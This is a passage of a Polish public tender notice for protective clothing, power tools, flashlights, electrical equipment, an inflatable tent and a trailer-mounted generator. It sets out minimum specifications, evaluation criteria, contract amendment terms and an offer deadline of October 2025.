kątem ich odporności na substancje chemiczne).<br/>-Odporność na kwasy i zasady.<br/>-Długość: min. 35 cm.<br/>-Grubość materiału: ≥ 0,5 mm lub zapewniająca równoważny poziom ochrony.<br/><br/>3)	Obuwie gumowe specjalne – 40 szt. (40 par)<br/><br/>Minimalne wymagania: <br/>-Ochrona przed chemikaliami, mikroorganizmami oraz zagrożeniami mechanicznymi.<br/>-Wykonane z trwałego materiału gumowego odpornego na chemikalia (np. neopren lub równoważny), szczelne, z komfortową wyściółką wewnętrzną.<br/>-Rozmiary: 42–46 (ilości poszczególnych rozmiarów do ustalenia z Zamawiającym).<br/>-Podeszwa antypoślizgowa, odporna na ścieranie.<br/>-Ochrona zgodna z normą PN–EN 15090:2012 F2I, HI3, CI, SRC, PN–EN 50321:2002 Klasa 0. <br/>Zamawiający dopuszcza ochronę zgodną z normami równoważnymi do wskazanej powyżej.<br/><br/>4)	Wodery – 40 szt. (40 par)<br/><br/>Minimalne wymagania: <br/>-Podeszwa antypoślizgowa z głębokim bieżnikiem.<br/>-Regulowane szelki z elastycznego materiału.<br/>-Materiał powlekany, np. poliester z PVC lub równoważny.<br/>-Gramatura: min. 600 g/m² (lub równoważna, zapewniająca odporność na uszkodzenia mechaniczne).<br/>-Odporność na zginanie w niskich temperaturach do –50°C.<br/>-Rozmiary: 42–46 (ilości poszczególnych rozmiarów do ustalenia z Zamawiającym).<br/>-Zgodność z normami EN 13688, EN 343 (lub równoważnymi).<br/><br/>Dopuszcza się rozwiązania równoważne potwierdzające spełnianie wymogów ochrony chemicznej, biologicznej i mechanicznej (np. certyfikaty równoważne wydane w UE lub uznane międzynarodowo). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">35113410-6 - Odzież ochrony biologicznej i chemicznej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">18114000-1 - Kombinezony</p> <p class="mb-0">18424000-7 - Rękawice</p> <p class="mb-0">18830000-6 - Obuwie ochronne</p> <p class="mb-0">35113400-3 - Odzież ochronna i zabezpieczająca</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">40 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach:<br/>1) Cena oferty brutto;<br/>2) Termin dostawy,<br/>3) Okres gwarancji udzielonej przez wykonawcę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji udzielonej przez wykonawcę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ IV ZAMÓWIENIA - ELEKTRONARZĘDZIA I SPRZĘT OŚWIETLENIOWY<br/><br/>Przedmiotem zamówienia jest dostawa elektronarzędzi i sprzętu oświetleniowego wg następującej specyfikacji:<br/><br/>1)	Pilarki do betonu i stali – 3 szt.<br/><br/>Minimalne wymagania: <br/>-Moc silnika: min. 5 kW,<br/>-Pojemność skokowa: min. 95 cm³,<br/>- Średnica tarczy: min. 400 mm,<br/>-Maksymalna głębokość cięcia: min. 140 mm,<br/>-Poziom drgań (lewa/prawa ręka): nie więcej niż 7,0/4,5 m/s²,<br/>-Urządzenie przystosowane do cięcia betonu, stali oraz innych materiałów budowlanych.<br/><br/>2) Wkrętarki akumulatorowe – 5 szt.<br/><br/>Minimalne wymagania: <br/><br/>-Zasilanie akumulatorowe, napięcie nominalne 12 V, <br/>-kompatybilność z akumulatorami producenta<br/>-min. 2 akumulatory 12V o mocy min 2,0 Ah<br/>-oryginalna ładowarka producenta,<br/>-walizka producenta,<br/>-Prędkość obrotowa - min. 400 obr./min <br/>-Moment obrotowy: co najmniej 20 Nm miękkiego / min. 35 Nm twardego lub równoważny, jeśli producent podaje inne wartości.<br/><br/>3) Latarki – łącznie 40 szt., w tym:<br/><br/>a.) Latarki przenośne – 20 szt.<br/><br/>Minimalne wymagania: <br/>-Strumień świetlny: min. 3000 lumenów,<br/>-Klasa szczelności: IPX4 lub wyższa,<br/>-Zasilanie: akumulatorowe z możliwością ładowania przez USB-C,<br/>-Odporność na upadki: z wysokości min. 1 m,<br/>-Funkcje dodatkowe: tryb stroboskopowy, SOS, czerwone światło migające,<br/>-Przeznaczenie: do użytku w trudnych warunkach terenowych i roboczych.<br/><br/>b.) Latarki czołowe – 20 szt.<br/><br/>Minimalne wymagania: <br/>-Strumień świetlny: min. 500 lumenów,<br/>-Zasięg świecenia: min. 35 metrów,<br/>-Zasilanie: akumulatorowe z możliwością ładowania przez USB-C,<br/>-Waga: do 100 g,<br/>-Tryby świecenia: co najmniej 4, w tym biały i czerwony stały oraz czerwony migający,<br/>-Odporność: na wilgoć i kurz,<br/>-Możliwość regulacji kąta świecenia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">43830000-0 - Narzędzia ręczne z napędem mechanicznym</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">31521320-3 - Latarki</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">40 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach:<br/>1) Cena oferty brutto;<br/>2) Termin dostawy,<br/>3) Okres gwarancji udzielonej przez wykonawcę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji udzielonej przez wykonawcę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ V – SPRZĘT ELEKTROINSTALACYJNY<br/><br/>Przedmiotem zamówienia jest dostawa sprzętu elektroinstalacyjnego wg następującej specyfikacji:<br/><br/>1)	Przenośne stacje zasilania – 2 szt.:<br/><br/>Minimalne wymagania: <br/>-Pojemność akumulatora: min. 2000 Wh,<br/>-Moc wyjściowa ciągła: min. 2000 W,<br/>-Funkcje dodatkowe: tryb UPS, możliwość ładowania z sieci, paneli fotowoltaicznych oraz gniazda sa-mochodowego.<br/><br/>2)	Przedłużacze bębnowe na zwijadle – łącznie 40 szt., w tym:<br/>a.) Przedłużacze bębnowe na zwijadle 20 szt. (1,5 mm2);<br/>b.) Przedłużacze bębnowe na zwijadle 20 szt. (2,5 mm2).<br/><br/>Ad. a) Przedłużacze bębnowe na zwijadle 20 szt. (1,5 mm2): <br/>Minimalne wymagania: <br/>-Długość kabla: min. 20 m.<br/>-Liczba gniazd: min. 4.<br/>-Przekrój przewodu: 3-żyłowy, 1,5 mm².<br/>-Stopień ochrony: min. IP44 (odporność na zachlapania, możliwość stosowania na zewnątrz),<br/>-Zabezpieczenie termiczne (wyłącznik nadprądowy lub termik) chroniące przed przegrzaniem przewodu podczas pracy na zwiniętym kablu.<br/><br/>Ad. b.) Przedłużacze bębnowe na zwijadle 20 szt. (2,5 mm2): <br/>Minimalne wymagania: <br/>-Długość kabla: min. 20 m.<br/>-Liczba gniazd: min. 4.<br/>-Przekrój przewodu: 3-żyłowy, 2,5 mm².<br/>-Stopień ochrony: min. IP44 (odporność na zachlapania, możliwość stosowania na zewnątrz),<br/>-Zabezpieczenie termiczne (wyłącznik nadprądowy lub termik) chroniące przed przegrzaniem przewodu podczas pracy na zwiniętym kablu.<br/><br/>3)	Rozdzielacze prądu – 14 szt.:<br/><br/>Minimalne wymagania: <br/>-Długość przewodu zasilającego: min. 2 m,<br/>-Wyposażenie w gniazda: co najmniej 1 gniazdo trójfazowe CEE 400V/16A oraz min. 3 gniazda jedno-fazowe 230V/16A,<br/>-Przekrój przewodu zasilającego: 5-żyłowy, min. 2,5 mm²,<br/>-Napięcie znamionowe: 230/400 V,<br/>-Obciążalność prądowa: min. 16 A,<br/>-Stopień ochrony: min. IP44 (odporność na zachlapania, możliwość stosowania na zewnątrz),<br/>-Wbudowane zabezpieczenia nadprądowe lub różnicowoprądowe dla ochrony użytkowników i sprzętu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31213100-3 - Rozdzielnie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">31224810-3 - Przedłużacze</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">40 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach:<br/>1) Cena oferty brutto;<br/>2) Termin dostawy,<br/>3) Okres gwarancji udzielonej przez wykonawcę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji udzielonej przez wykonawcę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ VI - DOSTAWA NAMIOTU MODUŁOWEGO PNEUMATYCZNEGO <br/><br/>Przedmiotem zamówienia jest dostawa namiotu modułowego pneumatycznego w ilości 1 szt. wg następującej specyfikacji:<br/><br/>Minimalne wymagania: <br/>-wymiary zewnętrzne (dł. × szer.): nie mniej niż 7,0 × 4,0,<br/>-tkanina poliestrowa powlekana PCV lub równoważna np. nylon powlekany PU,<br/>-gramatura min. 300 g/m²,<br/>-konstrukcja: aluminiowa, stabilna, umożliwiająca szybki montaż i demontaż,<br/>-namiot pompowany powietrzem, bez konieczności stałego zasilania,<br/>-materiał: trwały, wodoodporny, trudnopalny (lub równoważny), odporny na promieniowanie UV,<br/>-odporność na warunki atmosferyczne (wiatr, deszcz, UV) – po prawidłowym zakotwieniu odporność na podmuchy wiatru min. 35 km/h.<br/>-pompka do napełniania (elektryczna) z manometrem,<br/>-zestaw kotwiący (szpilki, odciągi),<br/>-zamykane wywietrzniki,<br/>-torby transportowe dostosowane do przewozu namiotu i osprzętu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39522530-1 - Namioty</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">40 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach:<br/>1) Cena oferty brutto;<br/>2) Termin dostawy,<br/>3) Okres gwarancji udzielonej przez wykonawcę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji udzielonej przez wykonawcę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ VII – DOSTAWA MOBILNEGO AGREGATU PRĄDOTWÓRCZEGO <br/><br/>Przedmiotem zamówienia jest dostawa mobilnego agregatu prądotwórczego (tj. agregatu wraz z przyczepką) wg następującej specyfikacji:<br/><br/>1)	Agregat - 1 szt.<br/><br/>Minimalne wymagania: <br/>-Moc znamionowa - co najmniej 12,0 kW;<br/>-Silnik: diesel, chłodzony cieczą;<br/>-napięcie wyjściowe 400 i 230 V, trójfazowe, 50 Hz;<br/>-Panel z przyłączeniami 3 faz (400V) oraz 1 faza 230V;<br/>-Zbiornik paliwa zapewniający min. 6 godzin pracy;<br/>-automatyczny system rozruchu i zatrzymania;<br/>-zabezpieczenia przeciążeniowe i przeciwzwarciowe;<br/>-Regulator napięcia typu AVR lub równoważny;<br/>-Funkcja / moduł automatycznego załączenia rezerwy (SZR/ATS); <br/>-Wąż do odprowadzania spalin o długości minimum 2,5m;<br/>-urządzenie w obudowie wyciszanej lub z wyciszoną konstrukcją; poziom hałasu w odległości 7 m nie przekraczający ~75 dB;<br/>-Ramy / uchwyty / punkty mocowania, umożliwiające bezpieczne transportowanie np. na przyczepie; <br/>-urządzenie fabrycznie nowe, wyprodukowane w 2025 r. <br/>-masa urządzenia nie powinna przekraczać DMS 750 przyczepki, na której ma zostać zamontowane<br/>-Wymiary agregatu - dostosowane do wymiarów przyczepki. <br/>-Dostawa produktu do Zamawiającego zamontowanego na przyczepie. <br/><br/>2)	Przyczepka samochodowa do transportu agregatu - 1 szt.<br/><br/>Minimalne wymagania: <br/>-Przyczepa samochodowa, dwuosiowa, lekka, z DMC do 750 kg;<br/>-Długość min. 260 cm;<br/>-Szerokość min. 120 cm;<br/>-Powierzchnia transportowa oraz rama konstrukcyjna wykonane ze stali zabezpieczonej antykorozyjnie (np. ocynk ogniowy lub równoważny);<br/>-Podłoga wytrzymała, odporna na warunki atmosferyczne, plandeka z materiału odpornego na promie-niowanie UV, ścieranie i deszcz;<br/>-Stelaż/plandeka w zestawie;<br/>-Koło podporowe;<br/>-Oświetlenie zgodne z przepisami prawa;<br/>-Błotniki nad kołami zabezpieczające koła i ładunek przed wodą/zanieczyszczeniami;<br/>-Mocowania / uchwyty do zamocowania ładunku. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31122000-7 - Jednostki prądotwórcze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">31121000-0 - Zestawy prądnicowe</p> <p class="mb-0">34223300-9 - Przyczepy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">40 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca najkorzystniejszy bilans punktów w kryteriach:<br/>1) Cena oferty brutto;<br/>2) Termin dostawy,<br/>3) Okres gwarancji udzielonej przez wykonawcę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji udzielonej przez wykonawcę</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> a) Pełnomocnictwo do podpisania oferty - w przypadku, gdy umocowanie osoby składającej ofertę nie wynika z dokumentów<br/>rejestrowych;<br/>b) Pełnomocnictwo lub inny dokument obejmujący umocowanie do reprezentowania w postępowaniu albo do<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego – w przypadku<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Wykonawcy ubiegający się wspólnie o udzielenie<br/>zamówienia ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia.<br/>W przypadku ubiegania się o udzielenie zamówienia przez Wykonawców występujących wspólnie są oni zobowiązani do<br/>ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego.<br/>Wszelka korespondencja będzie prowadzona przez zamawiającego wyłącznie z pełnomocnikiem.<br/>Oświadczenia potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie<br/>ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Dopuszczalne są zmiany niniejszej umowy w przypadkach określonych przepisami ustawy Prawo zamówień publicznych oraz zmiany dotyczące:<br/>1)	zmian nieistotnych rozumianych w ten sposób, że wiedza o ich wprowadzeniu na etapie postępowania o zamówienie nie wpłynęłaby na krąg podmiotów ubiegających się o zamówienie, ani na wynik postępowania. Takimi zmianami są w szczególności zmiany o charakterze administracyjno-organizacyjnym umowy np. zmiany dotyczące nazwy, siedziby Wykonawcy lub jego formy organizacyjno-prawnej w trakcie trwania umowy, innych danych identyfikacyjnych, zmiany prowadzące do likwidacji oczywistych omyłek pisarskich i rachunkowych w treści umowy; <br/>2)	zmiany oferowanych urządzeń w przypadku wykazania przez Wykonawcę braku dostępności na rynku zaoferowanego na etapie składania oferty produktu/urządzenia (wycofanie oferowanego przedmiotu ze sprzedaży/produkcji), pod warunkiem, że:<br/>a)	zmiany te zapewnią produkt/urządzenie o parametrach nie gorszych od parametrów produktu/urządzenia zaoferowanego na etapie składania oferty; <br/>b)	zmiany te nie będą wiązać się z koniecznością podwyższenia wynagrodzenia Wykonawcy.<br/>3)	zmiany w zakresie warunków/formy/metody dokonania zapłaty za dostawę przedmiotu zamówienia, w przypadku gdy będzie to zasadne ze względu na dotacje pozyskane/planowane do pozyskania przez Zamawiającego.<br/>Strony mają prawo do przedłużenia terminu wykonania przedmiotu umowy w przypadku:<br/>1)	wystąpienia siły wyższej uniemożliwiającej wykonanie przedmiotu umowy zgodnie z jej postanowieniami; przez siłę wyższą należy rozumieć zdarzenie zewnętrzne o charakterze niezależnym od Stron, którego Strony nie mogły przewidzieć przed zawarciem umowy, oraz którego Strony nie mogły uniknąć ani któremu nie mogły zapobiec przy zachowaniu należytej staranności; za siłę wyższą, warunkująca zmianę umowy uważać się będzie w szczególności: ataki terrorystyczne, działania wojenne, stan pandemii, epidemii itp. oraz ograniczenia w dostępności komponentów elektronicznych niezbędnych do produkcji sprzętu nagłośnieniowego lub oświetleniowego<br/>2) gdy wykonanie zamówienia w pierwotnym terminie będzie niemożliwe z przyczyn, za które Wykonawca nie ponosi odpowiedzialności np. wydłużonego czasu oczekiwania na dostawy od producentów sprzętu;<br/>3)	gdy zaistnieje inna okoliczność prawna, ekonomiczna lub techniczna, skutkująca niemożliwością wykonania lub należytego wykonania umowy zgodnie z SWZ,<br/>4)	gdy konieczność wprowadzania zmian będzie następstwem postanowień zawartych w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w tym instytucjami współfinansującymi;<br/>Dopuszczalna jest zmiana strony umowy w sytuacji, gdy w prawa i obowiązki Wykonawcy wstąpi inny podmiot.<br/>Dopuszczalna jest zmiana umowy w zakresie złożonej w ofercie deklaracji odnośnie podwykonawstwa poprzez: <br/>1) wskazanie innych podwykonawców; <br/>2) rezygnację z podwykonawców,<br/>3) powierzenia części zamówienia podwykonawcy, w sytuacji, gdy Wykonawca zadeklarował samodzielną realizację zamówienia.<br/>Warunkiem dokonania zmian, o których mowa powyżej jest: <br/>a) inicjowanie zmian przez Wykonawcę lub Zamawiającego, <br/>b) uzasadnienie zmiany prawidłową realizacją przedmiotu umowy, <br/>c) forma pisemna pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-10-03 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć na Platformie do elektronicznej obsługi 